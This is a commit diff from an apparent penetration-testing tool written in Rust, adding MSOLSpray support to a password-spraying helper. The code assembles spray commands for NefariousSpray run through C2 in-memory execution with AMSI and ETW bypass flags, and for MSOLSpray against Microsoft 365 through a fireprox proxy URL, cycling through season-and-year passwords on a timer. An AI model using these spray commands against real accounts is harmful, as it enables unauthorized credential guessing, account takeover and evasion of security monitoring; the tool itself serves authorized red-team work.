pyro/pentest_tool
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

added logic to do msolspray as well!

Browse Source 
this isn't tested very well, but give it a shot!
This commit is contained in:
pyro57000
2025-01-15 13:28:12 -06:00
parent 00e19bc1b4
commit bf95a375fb
1 changed files with 127 additions and 15 deletions
Download Patch File Download Diff File Expand all files Collapse all files

142
pentest_tool/src/info_controls.rs
View File

@@ -5,6 +5,7 @@ use std::io::Read;
use std::io::Write; use std::io::Write;
use std::path::PathBuf; use std::path::PathBuf;
use std::process; use std::process;
use std::result;
use std::thread; use std::thread;
use std::time::Duration; use std::time::Duration;
use std::io::stdin; use std::io::stdin;
@@ -201,14 +202,10 @@ fn find_file(dir: &PathBuf, file_name: &str) -> Option<String>{
return None; return None;
} }
pub fn password_spray_help(project: &Project, season: String, lseason: String, year: i32, tools_dir: &PathBuf, config_path: &PathBuf){ fn nefarious_config(tools_dir: &PathBuf) -> String{
let mut wait_time:u64 = 0;
let mut wait_time_response = String::new();
let mut exemethod = String::new();
let mut bell_path = config_path.clone();
bell_path.pop();
bell_path.push("bell.mp3");
let nefarious_spray_path = find_file(tools_dir, "obf-NefariousSpray.exe"); let nefarious_spray_path = find_file(tools_dir, "obf-NefariousSpray.exe");
let mut outline = String::new();
let mut exemethod = String::new();
loop { loop {
println!("how do you need to run it?"); println!("how do you need to run it?");
print!(" print!("
@@ -221,6 +218,123 @@ pub fn password_spray_help(project: &Project, season: String, lseason: String, y
if exemethod_result.is_err(){ if exemethod_result.is_err(){
println!("we need input here dummy!"); println!("we need input here dummy!");
} }
else{
match exemethod.as_str(){
"1\n" => outline = format!("execute-assembly {} spray -p ||PASSWORD|| -o C:\\temp\\fr\\||PASSWORD||.txt", nefarious_spray_path.map_or("".to_string(), |s| s)),
"2\n" => outline = format!("inlineExecute-Assembly --dotnetassembly {} --assemblyargs spray -p ||PASSWORD|| -o C:\\temp\\fr\\||PASSWORD||.txt --etw --amsi --pipe totallyawesomepipeyo", nefarious_spray_path.map_or("".to_string(), |s| s)),
"3\n" => outline = {let mut path = String::new(); println!("path to nefarious spray.exe"); stdin().read_line(&mut path).unwrap(); format!("run {} spray -p ||PASSWORD|| -o C:\\temp\\fr\\||PASSWORD||.txt", path.trim_ascii_end())},
"4\n" => outline = {let mut path = String::new(); println!("path to nefarious spray.exe"); stdin().read_line(&mut path).unwrap(); format!("{} spray -p ||PASSWORD|| -o C:\\temp\\fr\\||PASSWORD||.txt", path.trim_ascii_end())},
_ => println!("unknown exec method... try again")
}
return outline;
}
}
}
fn msolspray_config(tools_dir: &PathBuf) -> String{
let mut msolspray_path = String::new();
let mut outline = String::new();
let mut userlist = String::new();
let mut spray_target = String::new();
loop{
println!("path to your users list?");
let result = stdin().read_line(&mut userlist);
if result.is_err(){
println!("we need input here dummy!");
}
else{
break;
}
}
loop{
println!("target URL (probably a fireprox url)");
let result = stdin().read_line(&mut spray_target);
if result.is_err(){
println!("we need input here dummy!");
}
else{
break;
}
}
loop {
let mut response = String::new();
println!("is MSOLSpray.py in your path? (for example installed via pipx or pip)");
let path_result = stdin().read_line(&mut response);
if path_result.is_err(){
println!("we need input here dummy!!");
}
else{
response = response.to_lowercase();
if response.contains("y"){
msolspray_path = "MSOLSpray".to_owned();
}
else if response.contains("n"){
println!("trying to automatically find msolspray.py in your tools folder...");
let find_result = find_file(tools_dir, "MSOLSpray.py");
if find_result.is_some(){
msolspray_path = find_result.unwrap();
loop {
let mut response = String::new();
println!("Found it! located at {}", msolspray_path);
println!("is that correct?");
let result = stdin().read_line(&mut response);
if result.is_err(){
println!("we need input here bruv, try again...");
continue;
}
response = response.to_lowercase();
if response.contains("n"){
loop{
msolspray_path = "".to_owned();
println!("ok, so where is msolspray.py then?");
let result = stdin().read_line(&mut msolspray_path);
if result.is_err(){
println!("we need input here burv...");
continue;
}
else{
break;
}
}
}
msolspray_path = format!("python {}", msolspray_path);
break;
}
}
else {
loop {
println!("OOOOF we didn't find it burh... where is MSOLSpray.py located?");
match stdin().read_line(&mut msolspray_path){
Ok(_response) => break,
Err(_e) => println!("we need input here bruv... try again")
}
}
}
}
}
break;
}
outline = format!("{} {} -p ||PASSWORD|| --url {}", msolspray_path.trim_end(), userlist.trim_end(), spray_target.trim_end());
return outline;
}
pub fn password_spray_help(project: &Project, season: String, lseason: String, year: i32, tools_dir: &PathBuf, config_path: &PathBuf){
let mut wait_time:u64 = 0;
let mut wait_time_response = String::new();
let mut bell_path = config_path.clone();
bell_path.pop();
bell_path.push("bell.mp3");
let mut tool_to_use = String::new();
loop {
println!("which tool?");
print!("
1.) nefarious spray
2.) msolspray.py
");
let exemethod_result = stdin().read_line(&mut tool_to_use);
if exemethod_result.is_err(){
println!("we need input here dummy!");
}
else{ else{
break break
} }
@@ -285,14 +399,12 @@ pub fn password_spray_help(project: &Project, season: String, lseason: String, y
} }
println!("passwords loaded, and parsed!"); println!("passwords loaded, and parsed!");
println!("starting password display and timer operations..."); println!("starting password display and timer operations...");
let mut outline = String::new(); let mut outline = String::new();
match exemethod.as_str(){ match tool_to_use.as_str(){
"1\n" => outline = format!("execute-assembly {} spray -p ||PASSWORD|| -o C:\\temp\\fr\\||PASSWORD||.txt", nefarious_spray_path.map_or("".to_string(), |s| s)), "1\n" => outline = nefarious_config(tools_dir),
"2\n" => outline = format!("inlineExecute-Assembly --dotnetassembly {} --assemblyargs spray -p ||PASSWORD|| -o C:\\temp\\fr\\||PASSWORD||.txt --etw --amsi --pipe totallyawesomepipeyo", nefarious_spray_path.map_or("".to_string(), |s| s)), "2\n" => outline = msolspray_config(tools_dir),
"3\n" => outline = {let mut path = String::new(); println!("path to nefarious spray.exe"); stdin().read_line(&mut path).unwrap(); format!("run {} spray -p ||PASSWORD|| -o C:\\temp\\fr\\||PASSWORD||.txt", path.trim_ascii_end())}, _ => println!("unkown tool to use, try again...")
"4\n" => outline = {let mut path = String::new(); println!("path to nefarious spray.exe"); stdin().read_line(&mut path).unwrap(); format!("{} spray -p ||PASSWORD|| -o C:\\temp\\fr\\||PASSWORD||.txt", path.trim_ascii_end())}, }
_ => {println!("unknown exec method... try again"); return;}
}
for password in &passwords{ for password in &passwords{
let mut _spraycontinue = String::new(); let mut _spraycontinue = String::new();
let mut printline = outline.replace("||PASSWORD||", password); let mut printline = outline.replace("||PASSWORD||", password);